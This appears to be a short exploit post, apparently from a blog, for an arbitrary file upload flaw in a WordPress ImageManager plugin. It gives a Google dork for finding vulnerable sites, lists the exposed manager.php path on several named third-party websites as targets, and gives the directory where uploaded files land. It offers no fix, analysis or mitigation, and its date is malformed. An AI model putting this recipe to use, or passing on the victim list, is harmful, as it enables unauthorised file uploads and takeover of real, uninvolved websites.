============================================================================
# Exploit Title: WordPress Plugins ImageManager- Arbitrary File Upload
# Date: 04/11/017
# Tested on: Windows 7
1)---------- Search target with Google Dorking-----------------------------
============================================================================
inurl:wp-content/plugins/ImageManager/manager.php
-----------------------File Upload-----------------------------------------
Index of wp-content/plugins/ImageManager/manager.php
---------------------------------------------------------------------------
(PoC)
2)--------------------Exploit the websites---------------------------------
http://localhost/wp-content/plugins/ImageManager/manager.php
http://www.trejosolutions.com/blog/wp-content/plugins/ImageManager/manager.php
----------------------------------------------------------------
http://www.lesnap.com/wp-content/plugins/ImageManager/manager.php
http://www.magicrelationship.net/blog/wp-content/plugins/ImageManager/manager.php
------------------------------------------------------------------------------
------------------------------------------------------------------------------
3) --------------------------Location File:----------------------------------
http://localhost/wp-content/uploads/.thumbs/.FILE.jpg
Aucun commentaire:
Enregistrer un commentaire